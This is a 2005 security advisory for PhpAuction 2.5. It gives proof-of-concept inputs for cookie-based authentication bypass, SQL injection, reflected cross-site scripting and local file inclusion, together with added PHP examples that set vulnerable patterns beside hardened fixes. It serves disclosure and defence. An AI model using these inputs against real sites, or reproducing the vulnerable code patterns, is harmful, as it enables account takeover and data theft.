
Dcrab's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
 
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************
 
Get Dcrab's services to audit your web servers, scripts, networks, etc., or even to code them. Learn more at http://www.dbtech.org
 
Severity: High
Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple SQL Injection, Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
 
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are authentication bypass, multiple SQL injection, cross-site scripting and file include vulnerabilities in PhpAuction.
 

Proof of Concept Exploits:
 
Authentication bypass
Set the cookie as follows,
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersonate (you can get it from their profile)
Access the website, and you're instantly logged in as them ;)
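As an added example (not PhpAuction's code), here is the pattern behind this bypass beside a server-side fix: the cookie name comes from the advisory, while the users table columns, the PDO handle and the REMEMBER_SECRET placeholder are assumptions.

```php
<?php
// Added example, not PhpAuction code. Assumes session_start() has run and
// $db is a PDO connection to a users(id, username, password_hash) table.

// Vulnerable pattern (as the advisory describes): the cookie value IS the
// user id and is trusted as-is, so whoever sets it chooses who they are.
function current_user_vulnerable(): ?int {
    return isset($_COOKIE['PHPAUCTION_RM_ID'])
        ? (int)$_COOKIE['PHPAUCTION_RM_ID'] : null;
}

// Hardened pattern: identity lives only in the server-side session and is
// set after a successful password check; the client never supplies an id.
function login(PDO $db, string $username, string $password): bool {
    $st = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $st->execute([$username]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return false;
    }
    session_regenerate_id(true);          // fresh session id on privilege change
    $_SESSION['user_id'] = (int)$row['id'];
    return true;
}

function current_user(): ?int {
    return $_SESSION['user_id'] ?? null;
}

// If a persistent "remember me" cookie is needed, bind the id to a server
// secret with an HMAC so a forged id without a valid tag is rejected.
const REMEMBER_SECRET = 'REPLACE-WITH-RANDOM-32-BYTE-SECRET'; // placeholder

function remember_cookie_value(int $userId, int $expires): string {
    $payload = $userId . ':' . $expires;
    return $payload . ':' . hash_hmac('sha256', $payload, REMEMBER_SECRET);
}

function user_from_remember_cookie(string $value): ?int {
    $parts = explode(':', $value);
    if (count($parts) !== 3) {
        return null;
    }
    [$userId, $expires, $tag] = $parts;
    if (!ctype_digit($userId) || !ctype_digit($expires) || (int)$expires < time()) {
        return null;                      // malformed or expired
    }
    $expected = hash_hmac('sha256', $userId . ':' . $expires, REMEMBER_SECRET);
    return hash_equals($expected, $tag) ? (int)$userId : null; // constant-time
}
```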
 
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E
 
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/adsearch.php on line 33
 
/viewnews.php?id='SQL_INJECTION
Error: select * from PROSITE_news where id=\'SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION' at line 1
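As an added example (not PhpAuction's code), both injection points above rewritten with bound parameters: the PROSITE_news table and id column come from the error text, while the auctions table and its columns are assumptions.

```php
<?php
// Added example, not PhpAuction code. $db is an assumed PDO connection.

// viewnews.php: 'id' arrives as a string such as "'SQL_INJECTION" and the
// original query concatenated it into "select * from PROSITE_news where id=".
function fetch_news(PDO $db, string $rawId): ?array {
    if (!ctype_digit($rawId)) {             // ids are integers; reject the rest
        return null;
    }
    $st = $db->prepare('SELECT * FROM PROSITE_news WHERE id = ?');
    $st->execute([(int)$rawId]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// adsearch.php: 'category' and the repeated 'payment[]' values reach the
// query too. Every user value becomes a bound parameter, and payment[]
// becomes an IN (?, ?, ...) list with one placeholder per element.
function search_auctions(PDO $db, array $q): array {
    $sql    = 'SELECT id, title, ends FROM auctions WHERE 1=1';
    $params = [];
    if (($q['category'] ?? '') !== '') {
        $sql     .= ' AND category = ?';
        $params[] = $q['category'];          // "'SQL_INJECTION" is now just data
    }
    foreach (['minprice' => '>=', 'maxprice' => '<='] as $key => $op) {
        if (isset($q[$key]) && is_numeric($q[$key])) {
            $sql     .= " AND current_bid $op ?";
            $params[] = (float)$q[$key];
        }
    }
    $payments = array_filter((array)($q['payment'] ?? []), 'is_string');
    if ($payments) {
        $marks    = implode(',', array_fill(0, count($payments), '?'));
        $sql     .= " AND payment IN ($marks)";
        $params   = array_merge($params, array_values($payments));
    }
    $st = $db->prepare($sql);
    $st->execute($params);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}
```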
 
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159
Cross Site Scripting
 
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/login.php?username=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/viewnews.php?id=<script>alert(document.cookie)</script>
Cross Site Scripting
 
/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here
 
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
 
Fatal error: main(): Failed opening required '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' (include_path='.:/usr/local/lib/php') in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
 
/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
 
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
 
Fatal error: main(): Failed opening required '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php' (include_path='.:/usr/local/lib/php') in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
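As an added example (not PhpAuction's code) covering both the cross-site scripting list and the file include above: the `lan` parameter is reflected into the page and, as the error text shows, spliced into `includes/messages.<lan>.inc.php`, so one allowlist plus output encoding closes both. The supported language set and the file layout are assumptions inferred from the error messages.

```php
<?php
// Added example, not PhpAuction code. The include pattern is inferred from
// the advisory's error text; the language list below is an assumption.

// Vulnerable pattern: the request string is used to build the include path
// and echoed back raw, which is what both PoCs above exercise.
function load_messages_vulnerable(string $lan): void {
    include __DIR__ . "/includes/messages.{$lan}.inc.php";
    echo "Language: $lan";
}

const SUPPORTED_LANGUAGES = ['en', 'de', 'fr'];   // assumed bundled files

// Hardened: the request value only selects an entry from a fixed allowlist;
// the filesystem path is built from the allowlisted value, never from the
// request string, and any bad input falls back to the default.
function select_language(?string $requested): string {
    if ($requested !== null && in_array($requested, SUPPORTED_LANGUAGES, true)) {
        return $requested;
    }
    return 'en';
}

function load_messages(string $lan): void {
    $lan  = select_language($lan);                // defence in depth
    $file = __DIR__ . "/includes/messages.{$lan}.inc.php";
    if (!is_file($file)) {
        throw new RuntimeException("message bundle missing for $lan");
    }
    require $file;
}

// Every request value that is reflected into HTML is encoded for the HTML
// context; this covers 'lan', 'username', 'id' and 'auction_id' alike.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Usage: the echoed value is the allowlisted one, and encoded even so.
$lan = select_language($_GET['lan'] ?? null);
load_messages($lan);
echo 'Language: ' . h($lan);
```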
 

Keep yourself updated: RSS feed at http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
 
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com; please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://www.dbtech.org/. Look out for my soon-to-be-released book on secure coding with PHP.
 
 

Sincerely,
Diabolic Crab

